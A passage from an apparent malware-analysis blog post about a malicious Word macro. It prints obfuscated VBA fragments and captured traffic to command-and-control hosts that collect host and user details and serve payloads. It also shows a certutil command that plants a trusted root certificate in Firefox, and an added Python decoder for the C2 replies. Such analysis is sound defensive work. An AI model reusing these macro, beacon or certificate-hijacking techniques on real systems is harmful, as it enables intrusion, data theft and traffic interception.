hepaticopsida, ByVal equipollent)\r\naffably = ammodytes \/ 287\r\n\r\naffably = affably - 358\r\n\r\ncatsear debriefing, claustrophobic, 60 + 5534\r\ncatenation = 43\r\ncapriole = 29517\r\nnuances = 
302286\r\nautologous = SLN(nuances, capriole, catenation)\r\n\r\ntytonidae = debriefing\r\nEnd Function\r\nSub upper()\r\n    Dim InitialCaps As Range\r\n     Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _\r\n        End:=ActiveDocument.Words(3).End)\r\n    InitialCaps.Case = wdUpperCase\r\nEnd Sub\r\n\r\nFunction catsear(quidem, apopemptic, bonnily)\r\n#If Win64 Then\r\nDim pyocyanase As Variant\r\nDim chancellorsville As String\r\nDim algorism As LongPtr\r\nDim sediment As LongPtr\r\nDim belemnitidae As LongPtr\r\nDim chasser As String\r\nDim thuggery As LongPtr\r\nDim detachment As LongPtr\r\n#Else\r\nDim sediment As Long\r\nDim primitively As Integer\r\nDim algorism As Long\r\nDim ballot As Integer\r\nDim thuggery As Long\r\nDim amrinone As Byte\r\nDim belemnitidae As Long\r\nDim pathway As Variant\r\nDim detachment As Long\r\nDim almanac As Variant\r\nDim abient As Integer\r\n#End If\r\ncheckpoint = matutinal\r\naffably = Fix(117.376 + 114.2197)\r\nsediment = quidem\r\ndetachment = bonnily\r\nail = ail\r\nthuggery = apopemptic\r\nhuffing = 16\r\ncrisis = 28804\r\nnasally = 141610\r\ncoagency = SLN(nasally, crisis, huffing)\r\n\r\nmatutinal = catchpenny\r\nalgorism = 96 + 109 + 87 - 293\r\ncarnally ByVal algorism, sediment, thuggery, detachment, belemnitidae\r\naffably = ammodytes And 451\r\nEnd Function<\/pre>\n<p>Once the macro has been enabled allowing the malicious code to run, most of the traffic is done over port 80 and no other non-standard ports. 
The first URL that is contacted is api[.]ipify[.]org to obtain the public IP address of the system.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/ HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: api.ipify.org\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nServer: Cowboy\r\nConnection: keep-alive\r\nContent-Type: text\/plain\r\nDate: Wed, 25 Jan 2017 15:57:01 GMT\r\nContent-Length: 14\r\nVia: 1.1 vegur\r\n\r\n162.216.46.149<\/pre>\n<p>From here there are a couple of different C2s that my infected VM started to callback to via either GET or POST calls. Some of the callbacks are to the domain hedthowtorspar[.]com with details of my system. <\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/ls5\/forum.php HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: hedthowtorspar.com\r\nContent-Length: 110\r\nCache-Control: no-cache\r\n\r\nGUID=9259187252584972296&amp;BUILD=2501&amp;INFO=OPTIMUS @ OPTIMUS\\Administrator&amp;IP=162.216.46.149&amp;TYPE=1&amp;WIN=6.1(x64)\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:03 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP\/5.4.45\r\n\r\n3e4\r\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\r\n0\r\n\r\n-----\r\n\r\nPOST \/klu\/forum.php HTTP\/1.0\r\nHost: hedthowtorspar.com\r\nAccept: *\/*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: 2635\r\nContent-Type: application\/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; 
WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\n\r\n...\t..&gt;.b..%v.......%.I.&lt;.].9%\r\n#.d.....g..y.....W..g.....t....'...T..Y&lt;0EpG\/......:...I.......&quot;.?P.\tYX#..f.....I.P.f....?U.J....O.y...G...&lt;j..z.&amp;.@HA..*&lt;B ..=.&amp;.S..O...Q....\r\n..o.P.n.W....s.U..K\r\n..&gt;.v.......uY.......fw._...N...c.'...+6......A{&amp;...........^.O...:6^.:\\.........~|I(.).6.&lt;.O.ow.....i..|j.?;..Ur..w=.......M.p....+..T.9. 9.|.{..,_.......s\/.S.t;.?...].5......Y+.]p....a...;...&#x5B;d_.w...-a_.U=.O\r\n..o......67... .sZ.I}..a..j......q.....D.8....x.D.5H......Z.r.&#x5B;j....M.}...'i!...&amp;nq.......m&lt;.s..&gt;...................&amp;.D.}.%......V....l.....D.........E'iXG.|.b.....tW..n.....YN....g.@s.....:..\\.P..G\r\n.......N.O...E....Z......w&gt;^....T..#..d.$.Y...\/.Y2l...Qi7...A......&lt;....+#...y.B..6@...^G.E...t'.....!O..p.'b!.W%}..2&#x5B;..9..9.\/.m..6...x5~.\r\n.*..t....W.....zm..#X&#x5B;..s..J.Rt&quot;.......w6...m!....;W.(n:&#x5B;.......8..E.....\t_....(....A_...$..!Ijl..Jf.'m.O9....hr%.\/7s.....W....&amp;3...\/..Lo.}..iQ....c.....5&gt;H.|...tR.&#x5B;...3...v......`.$T....E.Uv8J&quot;.Y.........U.m..1..:A%.z@...,...~!..wDM.+...)N;..\r\n.`),...l....nN.^...9.G.A.@......'....?P.._..V}..h.$f...\tG....5r..G....g.j.}R5.K....`U...F.].u.*...Z.)g.... C.E{t....9...q?Taoip..dZJ.......{....Vy@.J...I..W.......';R.Te..l.*..l,.#c...!@4..#..8Id+..L...z....&amp;..#...E...M.....Z...N.6......b.0-90y...4.?..t.C. 2.....zN.J...x..K... ..&gt;......B]..'..,...C..\\?T.2.Y.......&quot;......c..zy...&lt;....... ....*.....u..f.s;.0.WR.hz.J......\r\n{5W.p4...U.V...:.=..&lt;...' 
...4(.1.D#...y...}.!..x....c.])....x..2..6;..E...B..J.......@.....W..M.;N.4.J&lt;.e..^.......n.I+........1..GS......J.7...\\.....r.@...K...\\.....|L....~..@..,o....$.!y...V..&lt;.t..k...V.4E...Q.\\....7E.......{eb..U\r\n.3.F...}|..s.m.U.....kl...y..t.DEX.t3B...8.'..T\r\n%eD....G..1....Jd.u...X.%T..&amp;....$....t....&lt;....z.3~.....~K.....&quot;..._....R.....b....\r\n......=j...K..v..5.&amp;....R&quot;..s.Yk9..G...B.....5...b...I...p.........MF...TP..xK.^. ..}.D..-6..?=o....m......&amp;.&quot;......re..m..,\r\nn....K.....3....(&#x5B;NA7........0.1.}.R..D...y....CWm.....z......4.T.&amp;s&#x5B;.....i3.d:V..c?.......v.s1..g.......n...&#x5B;!........d.....+wC..p.t.G.g..9.:@.....,98....Q..)..v..............`vX..k...+.....Gk j-.\\.a.{.3$.|.....f...i...b.z...R\t.....Z6.8.I.3{..C.....8...z..r...(^..yOA.{%x] z....-v......&quot;'J..{MG%.......K5....t..S-.A&quot;r.9.y..{Z8.J.:...GH.5..O.).l..(.....n...G.w.R+..h..=U..KxGaMfB..@...&quot;%...G..y.!.^.\t...Zzd....j..e).|.m.|e$........h!D.g.O..s.\/u^......a.u&amp;..k.y...P|\r\n...S....Z.=.............&gt;...Oq&amp;...3S.m......\r\n...I...D.4.UJ.O.P@OZ...Dc.....m....+r.oYo..!\/..;.&quot;2_.w.......xV....T\/g.....h...T..{..g..8~...V._...t.-......_..,.e\r\n..&#x5B;.v.!...8....Q....]h.....q....Ga...`..j...q.....,....7...lJ\\W..J.......5.\t..Y..\/{...4..^a.U.}....C............).1.7...-.....(.BF..&quot;tt..3n.ec.A..*k..s1..d.L.\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:12 GMT\r\nContent-Type: text\/html\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\n\r\n..d!t..kf...w02.J...\r\n\r\n-----\r\n\r\nPOST \/ls5\/forum.php HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: hedthowtorspar.com\r\nContent-Length: 110\r\nCache-Control: no-cache\r\n\r\nGUID=9259187252584972296&amp;BUILD=2501&amp;INFO=OPTIMUS @ 
OPTIMUS\\Administrator&amp;IP=162.216.46.149&amp;TYPE=1&amp;WIN=6.1(x64)\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:59:15 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP\/5.4.45\r\n\r\nc\r\nCQJXARRABw==\r\n0<\/pre>\n<p>We also see two GET requests to the domain sy-nitron[.]pl, for \/wp-content\/themes\/twentyfifteen\/pm1 (46,331 bytes) and for \/wp-content\/themes\/twentyfifteen\/2501 (182,526 bytes). Both are served as text\/plain but the bodies are binary, and the 2501 path matches the BUILD value sent in the check-in above.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/wp-content\/themes\/twentyfifteen\/pm1 HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: sy-nitron.pl\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 25 Jan 2017 15:57:03 GMT\r\nServer: Apache\/2\r\nLast-Modified: Wed, 25 Jan 2017 12:56:37 GMT\r\nETag: &quot;5e60f5c-b4fb-546eac3573e11&quot;\r\nAccept-Ranges: bytes\r\nContent-Length: 46331\r\nConnection: close\r\nContent-Type: text\/plain\r\n\r\n...Tm]y.....7.y.....i]I.....meT....ltm....&lt;REST OF PACKET&gt;\r\n\r\n-----\r\n\r\nGET \/wp-content\/themes\/twentyfifteen\/2501 HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: sy-nitron.pl\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 25 Jan 2017 15:57:13 GMT\r\nServer: Apache\/2\r\nLast-Modified: Wed, 25 Jan 2017 12:56:52 GMT\r\nETag: &quot;5e60f5f-2c8fe-546eac4414ff0&quot;\r\nAccept-Ranges: bytes\r\nContent-Length: 182526\r\nConnection: close\r\nContent-Type: text\/plain\r\n\r\n...T.,@?..X.#,C?...T.,.....T.,@?..UT.,@?...T.,@?...T.,@?...T.,@?...T.,.?..E..,.&gt;...,.t@?...T.,.?...U.,@...&lt;REST OF PACKET&gt;<\/pre>\n<p>Lastly we see callback activity to the site rowatterding[.]ru via POST requests to \/bdk\/gate.php, followed by a request to checkip.dyndns.org to look up the public IP address a second time.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" 
title=\"Click here to expand...\">\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\/6.0)\r\nHost: rowatterding.ru\r\nContent-Length: 908\r\nConnection: Close\r\n\r\n.%....2.\t...\\M..Y..=K..rB\\h..2..v....(b.....G....0..c........).D...%&gt;.n...S.....+.dO.]z...c2.&amp;..HEt'N.#a1...q..H.c2]|-.....S..VkXs...&#x5B;...5\r\n..20...84.....?.E..3z..y.m.P..&amp;.'-84.......-..Yo&quot;.`#....}...P..#....`h...A......l...\\......u8.5..H.....A).?....|S.F.Q.........;{...# ..c.(......X..,. .. B......Z..4\r\nG.Lh...L..\t..F...`..Q.sHh..$...'.\r\n.x.K..C..!E..~&gt;\r\n..(....q.Sr..D...F.A........9C..%.*..H........^g.c...{t.M.&gt;sb3.@M.....'...7..e.)....@....D..@.&#x5B;2..4.....\\&amp;....Y..:....d....K....7.u.o.t.}._..I.....D....Z.\/....%.r..A.Hu...K.....j8..V..;...J......5e.....{..8..H.3n.....+.....H........;.+......=.Ur....6.H...m.IE..;Oe3~..4....6(.?..7..?......l`..a'm%...(.L...mX%.As..j`...v...%.p....v.=)..&gt;q..b.\t$~..`.....n...1S..F....4.VF......jl.r...I.&lt;....K.,.&gt;...'.j..~...tf^..m...w..w.+H*..&#x5B;..&gt;l.'.nP2iZH-..Bl;Bd...X..y...$V..w.O?.fEnF\r\n..].M..T.%..^...V.N.%....W..4j' .....i.d..2.V.v....1..2..M.,-..U..&#x5B;f.`..c\\d....E..\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:15 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 7186892\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Description: File Transfer\r\nContent-Disposition: attachment; filename=tv.dat\r\nContent-Transfer-Encoding: binary\r\nExpires: 0\r\nCache-Control: must-revalidate\r\nPragma: public\r\n\r\n&lt;].#..U7q.v....?rE^.i..S...)..L..rO...y!.........d...TxY..-G|.w.\\^$..).......&lt;REST OF PACKET&gt;\r\n\r\n-----\r\n\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\/6.0)\r\nHost: 
rowatterding.ru\r\nContent-Length: 1060\r\nConnection: Close\r\n\r\n.'.L.v....@.P....A.h.I0.....O.I..=..\r\n..R.&amp;...,yqW.SV.Y=L...&gt;M.Y. aC........1.wX'....|..&lt;yg....:...........u%.T..f.....i.......p....!T..u..'..YzdM.....t....f..hY.&amp;..(.&lt;&quot;;r..Si....^?.....R....#.#h.....u..h.e.&gt;..=..&amp;..~.t...(.Q&gt;.;`^7.7n....Y..A...y.L....Cr1.N.Cz...0Ed. .m.K...hvY.......w.L.&quot;..D&gt;.D......3....y..8..%.^.!..-....z..N..w.&gt;d.....F.....D.;..).&quot;3V2..j\r\n........=|.....1P.....m.9.i.+..w...OK.{A...N.X...`g.Z.'....WT...b...&gt;?.gB.E.w...X.....Wz.....%@....d.@..;.y..%..Mf...T.........\r\n..&quot;K..2w...0......e..&lt;....o...v...........`.o.)Xo....\r\n.s.....g}.....t.......d5]&quot;.,..9...C......Fb...A..5.a..H..x&#x5B;J.&amp;D...~&quot;k%....e&#x5B;...\t.pd..u..~..j:..=9&#x5B;...e.uH.S..ZS.w.8...7..P.1...#...U'...&#x5B;..MD&lt;..lk..G\r\n.....kN.......B..{x.....J....:.O..I..1.)*66.........!XR]P|...m....Z.A.........j..\r\n....k...0..&gt;......0.....2...\\..+.H?.C....V4f..K2$...........&amp;v..I}?.$..`.......#.@............dJ`Y&#x5B;R(....4.Et.g.h.&lt;;.x.....(.^+689.....Y...2..m..q0...F`..N...;..F....J{?..&lt;...H&quot;.Y..G.........#..7..DN.........a.-B.....i...&lt;....QR8........S..'.....:.f...\r\nz.s..I...uKA....h.\\..\r\n..T..*.p6q.\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:39 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\n\r\ne35\r\n...x4B..'..m...Np8..N..xHVb..=.......@..z;...q...q..&quot;...t....h........vT.OM.....%#js.ar...VZ.2..9MT +.Cdks....A^.|H..m....Ln....vzf......D.u......jmvv.Yc.i.X:.....D..........]P.F...lRP{.A..a.@..\r\nT!U..4\t.S.}.G..Fj.......'U....r......Jz .M .....\/ZP.g...z........q82.&gt;:....3..&quot;..Q`86.O...f=...+.2.....u4.B.h...6...7.&#x5B;.q..V5\tly....L..k}.\r\n.'-!..^..!......DN...&amp;...Y.^:.i.\t&lt;REST OF PACKET&gt;\r\n\r\n-----\r\n\r\nGET \/ HTTP\/1.1\r\nAccept: *\/*\r\nConnection: Close\r\nUser-Agent: 
Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: checkip.dyndns.org\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Type: text\/html\r\nServer: DynDNS-CheckIP\/1.0\r\nConnection: close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Length: 106\r\n\r\n&lt;html&gt;&lt;head&gt;&lt;title&gt;Current IP Check&lt;\/title&gt;&lt;\/head&gt;&lt;body&gt;Current IP Address: 162.216.46.149&lt;\/body&gt;&lt;\/html&gt;<\/pre>\n<p>More POST requests to rowatterding[.]ru follow once the IP address has been obtained. Note that these later requests use the same long MSIE 7.0 User-Agent string as the checkip.dyndns.org lookup, whereas the first two POSTs to \/bdk\/gate.php used a shorter MSIE 10.0 string.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: rowatterding.ru\r\nContent-Length: 677\r\nConnection: Close\r\n\r\n.........?...G]..(v..E&lt;.....M.K.&quot;K.ec%\/..`k....Qw.sv.y.l..'.m.y..Ac..3.......Wx.....\\...YG..&lt;..5.....&quot;....U.7t..F.....I.92....P.....z..h..:.QwT....=y...\t.Q.KN.....&gt;.\r\nJ.7).v&#x5B;=....VY..........4..@.....z..w.~w&#x5B;.q\\..k...t.D(....=.;`b...g....b...|X.I.U+x.X+..i..F.wN..z.......&lt;..........a}AK...o.y...K.$b.v=.@.,.....NM#....f4..+5...V01..H.&gt;...}&lt;..r&#x5B;\r\n.).....%j....dpK.AxR.Y.ap.....j..3..Q...9\r\nT.....Fhf.ez...8ABF.K...bH.IM......I.U.DQ2........l..]K.!$.5...&quot;....u.QL.....).........b7...V......S...R..F.C...;Z..^.5......D*6b..0........#.#Xq....i.x...&gt;..1....\r\n\r\n....:.?.u$.V.d.........*6.w....%.yZ...K0.$..-.....:......1........YE.....&lt;....@...e..P.D.,..V....M........H...S.?........Il+p\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:58:23 
GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\n\r\n5ae\r\n....]820...&quot;.wQ..DOu\r\n..5..\/L.y.U..a..!..&gt;.C.6*......B...7......e...'-.Z?&amp;'e......(P{.Kl...P......rC...........B}.W.iY..(.R..........\r\n.....I..)\r\nWD]....c..i.........)..........0(.:...&quot;].q.R.;6.....BG&lt;...{.....6...4.......(.....M......,_\r\n3$....0.@.k.*..yU....x...C.........j..3...p|9.\\E..5r...;.).....*r...)..&#x5B;:..]sCR.;Gv.8.r0....M..&amp;m...q`e.NH..?......L\r\n^..p.....}=.'.DT.'.f......7 ....).S=.!G.\\~.CG.....z......p...$...l.RA,.....JU.F.......p....E..Hy........K.......n..R.'..&quot;A..F..R.lZ...C.TP.?.k^j.u.-.,.}...Y..CH.M.....]&#x5B;..Q..\t....&lt;..\tN'7.D._S....2m...9.......-l`K.PX..X+noM=.&lt;.R..\tG...:vu....A.......so.......'%...cf..x4..Bt.#.'.\r\n9.l.~....O\r\n.............\r\njg=..l.b..hl...r..=....l..O(G...^dr..8.........o6.Y......}.p.3V.v...{...KfW.\/..R..s..?H.}...z.U....(.OS.!..&lt;.:5....h}..e.&quot;....x.1.&amp;S.P....Q...q1EP.IV....1J..K~3u.D.p'.P.....c........'6.u..a......Ic.Q.}....j...-.t.h .......&gt;.Nq.z.!....L.......O1j.^.~j...3Z.;....l....r...~m.P.....&amp;.....gI.Xo.C..y.t..#........F.A..+..m..Qo.C....nd.Q..5.}.$gB..*...&gt;^@+E..M.$..Mt..p.kp.&gt;.e.7!-.A.)\t..M.h.\t..(.s.....N:.....v9Sp.....O.&lt;U..r..-8k`..K......f.4\t9d#.4.X..a.e.]4........|..k..\/\/J\r\n.9.3..B(mXM'y.....t..w...T.b...g|&lt;. g{?....\\&lt;.A.C._.....)....f......&amp;.&lt;...f..D....K1.........d..a...U.\tb..zY..&gt;a..E.....o.A.O..W....2..{..r...^.~.....o..t.......o..`.#5.g..&gt;......,.....\\.p....v.L.{.P0..3=.U..m.u8w..R.+....Rf..(Q......ze~.....6...ee.....04.8......Kr....JM.6-..k..C......q...*.....c... 
..?S.....A..S....B6.P#&lt;...\r\n0<\/pre>\n<p>Two of the responses from rowatterding[.]ru are served as a file download rather than as text: Content-Type application\/octet-stream with a Content-Disposition header naming the attachment tv.dat. The first one, shown above, is 7,186,892 bytes long; the one below is only 699 bytes, yet is served under the same file name.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: rowatterding.ru\r\nContent-Length: 298\r\nConnection: Close\r\n\r\na.q..2..]..&gt;)...&amp;E.`.J3.....O.I.,i.2.......y ..Mk.oj.e.p..;.q.e..]...\/.....\r\n.Kd.....@...E&#x5B;.. ..).....&gt;....I.+h..Z.....U.%.....L.....u..e..7.^x&#x5B;....\\.y.......~.@`,~...M*F..6.ay...r.x..'oj.%....uI....AoW.}...\/.\r\ng..0......Ni.tX.._...$..E.,..\/.J3di.^.....^...{?...L(sl1..)..\r\n.Il...V......WF.=|........~\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:58:24 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 699\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Description: File Transfer\r\nContent-Disposition: attachment; filename=tv.dat\r\nContent-Transfer-Encoding: binary\r\nExpires: 0\r\nCache-Control: must-revalidate\r\nPragma: public\r\n\r\n.l..x.$^...*...B--...#Z.....&quot;.$.t......L..E&#x5B;eC.&amp;......r...*.....S'%..|......<\/pre>\n<p>Looking at this from a high-level system perspective and not just from the network: the Word document starts an SVCHOST process, which in turn kicks off a &#8220;CMD.exe \/K&#8221; command in thread 2272. The SVCHOST process also creates a file called &#8220;BNCF61.tmp&#8221; in the &#8220;C:\\Users\\%username%\\AppData\\Local\\Temp\\&#8221; folder and then starts it as a new process as well. 
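<\/p>\n<p>Stepping back to the network side for a moment: the check-in to \/ls5\/forum.php and the short base64 reply are easy to process mechanically. The following is an added example, not code from the original post, that parses the form-encoded beacon, reassembles the chunked reply and decodes it. The XOR key 0x7A is an assumption taken from public Hancitor decoders rather than from anything on this page; that it turns the captured reply into the brace-delimited {opcode:argument} syntax those write-ups describe is the corroboration. The multi-command reply at the end is constructed, with placeholder hosts, to show the parser on more than one command.<\/p>\n

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed from the capture on this page: the POST body sent to /ls5/forum.php and
# the chunked body of the reply to the third check-in.
CHECKIN_BODY = ("GUID=9259187252584972296&BUILD=2501&INFO=OPTIMUS @ OPTIMUS\\Administrator"
                "&IP=162.216.46.149&TYPE=1&WIN=6.1(x64)")
REPLY_BODY = "c\r\nCQJXARRABw==\r\n0\r\n\r\n"

# Assumption, not from the page: Hancitor replies are base64 text XORed with 0x7A,
# as described in public decoders for this family.
HANCITOR_XOR_KEY = 0x7A

# Commands arrive as a run of {opcode:argument} groups after a short prefix.
COMMAND_RE = re.compile(r"\{([a-z]):([^}]*)\}")


def parse_checkin(body: str) -> dict:
    """Split the form-encoded beacon; INFO is 'HOSTNAME @ HOSTNAME\\user'."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    host, _, user = fields.get("INFO", "").partition(" @ ")
    fields["HOSTNAME"] = host
    fields["USER"] = user
    return fields


def dechunk(body: str) -> str:
    """Reassemble an HTTP/1.1 chunked body: hex size line, data, ..., a 0-size chunk."""
    out, rest = [], body
    while True:
        size_line, sep, rest = rest.partition("\r\n")
        if not sep:
            raise ValueError("truncated chunked body")
        size = int(size_line.split(";")[0].strip(), 16)  # ignore chunk extensions
        if size == 0:
            break
        out.append(rest[:size])
        rest = rest[size:]
        if rest.startswith("\r\n"):
            rest = rest[2:]
    return "".join(out)


def decode_reply(chunked_body: str, key: int = HANCITOR_XOR_KEY) -> str:
    """base64-decode the dechunked reply and XOR every byte with the key."""
    raw = base64.b64decode(dechunk(chunked_body))
    return bytes(b ^ key for b in raw).decode("latin-1")


def encode_reply(plain: str, key: int = HANCITOR_XOR_KEY) -> str:
    """Inverse of decode_reply, used here only to build a constructed reply."""
    enc = base64.b64encode(bytes(ord(c) ^ key for c in plain)).decode("ascii")
    return "%x\r\n%s\r\n0\r\n\r\n" % (len(enc), enc)


def parse_commands(decoded: str) -> list:
    """Return (opcode, argument) pairs in order of appearance."""
    return COMMAND_RE.findall(decoded)


if __name__ == "__main__":
    beacon = parse_checkin(CHECKIN_BODY)
    print("host=%s user=%s build=%s win=%s" % (beacon["HOSTNAME"], beacon["USER"],
                                               beacon["BUILD"], beacon["WIN"]))
    decoded = decode_reply(REPLY_BODY)
    print("reply decodes to %r -> commands %r" % (decoded, parse_commands(decoded)))
    # Constructed multi-command reply; the hosts are placeholders, not from the capture.
    fake = encode_reply("{l:http://example.invalid/pm1}{b:http://example.invalid/2501}")
    print(parse_commands(decode_reply(fake)))
```

The captured reply decodes to a three-character prefix followed by {n:}, an opcode with no argument; the reply to the first check-in, whose chunk body is not reproduced above, is the one that would have carried the URLs for pm1 and 2501, since those downloads start in the same second.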
The &#8220;BNCF61.tmp&#8221; file then starts &#8220;explorer.exe,&#8221; which in turn starts up the &#8220;MSIEXEC.exe&#8221; process. At this point numerous files have been written to the file system in the &#8220;C:\\Users\\%username%\\AppData\\Local\\Temp\\&#8221; folder and to the &#8220;C:\\Users\\%username%\\AppData\\Roaming&#8221; folder (see the artifacts section above). One thing to note here &#8211; most of the files written to the filesystem are written by the MSIEXEC.exe process or the certutil.exe process, with a handful of files being written by the &#8220;SearchProtocolHost.exe&#8221; process. <\/p>\n<p>Also, as seen in the Process Monitor logs, the MSIEXEC.exe process starts up a &#8220;certutil&#8221; process:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nDate: 1\/25\/2017 9:57:35 AM\r\nThread: 2008\r\nPID:\t2088\r\nCommand line:\t&quot;C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\certutil.exe&quot; -A -n &quot;ybarwio&quot; -t &quot;C,C,C&quot; -i &quot;C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\akpeydzais.crt&quot; -d &quot;C:\\Users\\Administrator\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cnpfjmzq.default&quot;<\/pre>\n<p>which adds this to the Firefox Certificate Manager under &#8220;Authorities.&#8221; Note that this is not the Windows certutil: the -A (add), -n (nickname), -t (trust flags), -i (input file) and -d (database directory) switches belong to the certutil tool from the NSS library that Firefox and Thunderbird use for their certificate databases, and the malware dropped its own copy into the Temp folder alongside the certificate. The trust string &#8220;C,C,C&#8221; marks the certificate as a trusted CA for SSL server certificates, e-mail (S\/MIME) and object signing, so any certificate chained to it will be accepted by Firefox without a warning.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/SSL-from-FF.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/SSL-from-FF.png\" alt=\"\" width=\"519\" height=\"640\" class=\"aligncenter size-full wp-image-699\" \/><\/a><\/p>\n<p>and it looks like it adds the same certificate to Thunderbird as well:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nDate: 1\/25\/2017 9:57:37 AM\r\nThread: 2008\r\nPID:\t2768\r\nCommand 
